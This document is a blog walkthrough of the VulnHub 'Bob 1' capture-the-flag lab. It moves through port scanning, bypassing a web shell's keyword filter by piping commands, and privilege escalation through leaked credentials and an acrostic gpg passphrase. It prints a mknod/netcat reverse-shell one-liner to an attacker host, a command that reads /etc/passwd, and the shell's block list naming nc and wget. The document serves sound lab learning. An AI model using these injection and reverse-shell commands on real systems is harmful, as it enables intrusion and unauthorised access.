CTF: Bob 1 – vulnhub CTF walkthrough

VM: https://www.vulnhub.com/entry/bob-1,226/
Author: c0rruptedb1t
Difficulty: Beginner/Intermediate
Privilege Escalation: Intermediate
Target IP: 192.168.75.130

Phase 1: Enumeration

The full-range port scan using nmap discloses three services running with remotely accessible ports:

-> an ftp server running the ProFTPD version 1.3.5b daemon
-> an Apache web server running on port 80
-> a ssh daemon  running on the uncommon port 25468:
Phase 1: Enumeration - bob 1 - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
# nmap -O -sT -sV -p- -T5 192.168.75.130
The ftp server doesn’t allow anonymous access and there’s a robots.txt file on the target server so my summary looked like something like this:
Of course, it may seem like a mess to someone else reading it, but overall I started enumerating each linked page on the target as well as the pages residing within the robots.txt file. The dev_shell.php file seemed to be of most interest, and even though it seemed to contain some kind of filter the simplest way I found to execute a command was to pipe echo along with the command:
echo|cat /etc/passwd
 
dev_shell.php - Remote Command Execution vulnhub CTF walkthrough - d7x - PromiseLabs - blog
http://192.168.75.130/dev_shell.php

Running dirb with the -X .bak option would additionally disclose there are some .bak files on the server containing the sources of the php files, which I achieved easier using listing the web server directory contents from the dev_shell.php web shell, which shows what exactly kind of filter is used. Also note that the web server front page menu has a z-index of -11 which makes the links inaccessible directly so I just reverted it to a positive 11 to be able to navigate through the browser. The source code of dev_shell.php.bak:

 <?php
 //init
 $invalid = 0;
 $command = ($_POST['in_command']);
 $bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
 ?> 
...
<? php
 system("running command...");
 //executes system Command
 //checks for sneaky ;
 if (strpos($command, ';') !==false){
 system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
 }
 else{
 $is_he_a_bad_man = explode(' ', trim($command));
 //checks for dangerous commands
 if (in_array($is_he_a_bad_man[0], $bad_words)){
 system("echo Get out skid lol");
 }
 else{
 system($_POST['in_command']);
 }
 }
 ?>
The above script would check for a ‘;’ string within the command input, then iterate through the commands and parameters in case not found, split the input by a space and iterate through each array value, and disallow triggering a command in case it’s in the list of restricted commands. However, in case a command is piped it gets executed as the script is vulnerable to command execution via piping and doesn’t check for a “|” passed to its input.

Phase 2: RCE

To spawn a shell, I used the following commands:
echo|mknod /tmp/backpipe p
echo|/bin/sh 0</tmp/backpipe | /bin/nc 192.168.75.120 443 1>/tmp/backpipe
Getting a shell on Bob 1 - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
Getting a shell
The ftp server also seems to be prone to the mod_copy Remote Command Execution with E-DB ID:  36803 however as the DocumentRoot directory belongs to root, trying this as an exploitation vector wouldn’t work as there isn’t a writable folder on the web server which can be used to store a file and trigger an RCE from there.

Phase 3: Putting together the pieces

From this point it’s all about connecting who said what about who and who stored what (or where) as a password. While browsing through the /home directory the first thing that brought my attention was the file theadminisdumb.txt

Password for user James (jc) is Qwerty - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
Password for user jc : Qwerty
Trying to login as elliot : theadminisdumb would not work, however a login to the system using user jc (james) worked out of the box:
user jc - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
User jc
A file named .old_passwordfile.html can be located in user bob’s home directory as well, exposing additional credentials:
Old password file - getting credentials - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
Getting credentials for user jc and seb from within bob’s directory
As can be seen from the screenshot jc has some restrictions placed on his account and is unable to cat files, which can be bypassed by using head, tail or the strings binary. However as a more convenient surface it’s better to aim in further enumeration using Sebastian’s account.

Phase 4: Privilege Escalation

The privilege escalation on this box is rather easy, as long as you look for something suspicious, out of the regular picture. I keep seeing how most people advise to enumerate configuration files and look for issues (with which of course I agree), but my lesson learned on this box was with privilege escalation – there was a file residing on the server, which supposedly should have contained something important – so you have to look for the human element. Once you browse through the directory structure in /home you’d notice the following files in the “Documents” folder of user bob:
Bob's documents - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
Bob’s documents
The file command reports the login.txt.gpg as a “GPG symmetrically encrypted data (AES cipher) A gpg encrypted file named “login”, is definitely something that must contain valuable information  so it has to be looked in thoroughly. Initially I tried cracking the login.txt.gpg passphrase using the tool PGPCrack-NG and the rockyou.txt dictionary and just left it while doing further enumeration. I didn’t even think it might be stored somewhere in plain-text. The tool didn’t seem to find anything even though I left it for hours while looking for proftpd and ssh(d) misconfigurations due to the output of sudo -l. Enumerating the user’s bob folder further shows the following content represented in some text files:
Bob's documents - staff.txt - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
# cat staff.txt
This somehow suggests that the user “bob” is in charge on this server, so getting access with bob’s privileges might be worth trying. Looking at a bash script echoing some commands within the directory discloses the following text:
Bob's documents - notes.sh - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
# cat notes.sh
It doesn’t quite make sense and looks like some random notes from someone bored just talking to himself. The word “Cucumber” seems out of the equation and I tried it as a possible password on the login.txt.pgp file with no success. At this point I skipped this file and decided it contains nothing useful for hours while trying to look into configuration glitches on the server (like mentioned above). However looking carefully at the whole picture, and especially the suspicious notes.sh file which is kept in a folder named “Secret” reveals that the first letter of each sentence is actually a word:
-= Notes =-
 Harry Potter is my faviorite
 Are you the real me?
 Right, I'm ordering pizza this is going nowhere
 People just don't get me
 Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
 Cucumber
 Rest now your eyes are sleepy
 Are you gonna stop reading this yet?
 Time to fix the server
 Everyone is annoying
 Sticky notes gotta buy em
So the word “HARPOCRATES” (which according to google was the God of silence, secrets and confidentiality) should be either a password for the account Bob or the password required to unlock the file. Trying it as a direct password on user Bob didn’t work:
Bob's documents - HARPOCRATES - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
Trying to login with bob : HARPOCRATES
However, I succeeded in trying to decrypt the login.txt.gpg file using the passphraseHARPOCRATES” straight of the box, directly using the shell on the server:
Decrypting login.txt.gpg - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
# gpg –batch –passphrase HARPOCRATES -d login.txt.gpg bob:b0bcat_
Logging in with user bob:b0bcat_
Privilege Escalation - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
Privilege Escalation on target Bob – PromiseLabs blog, vulnhub CTF walkthrough
And getting the flag:
Getting the flag - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
Getting the flag on target Bob – vulnhub CTF walkthrough by d7x